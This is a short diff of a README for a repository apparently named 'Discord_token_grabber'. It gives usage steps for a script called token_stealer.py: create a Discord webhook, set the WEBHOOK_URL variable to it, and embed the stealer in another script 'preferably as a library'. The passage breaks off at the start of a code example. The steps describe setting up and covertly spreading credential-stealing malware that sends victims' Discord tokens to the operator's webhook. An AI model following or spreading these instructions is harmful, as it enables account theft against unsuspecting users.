MegaTheTeapot/Discord_token_grabber/README.md

 # How to use
  1. Create a webhook on your Discord server.
- 2. Change the 'WEBHOOK_URL' variable value to your Discord webhook URL in [token_stealer.py](token_stealer.py)
 <br>
- 2.5. add it to another script (preferably as a library)
+ 2. add it to another script (preferably as a library)

 example:
 ```python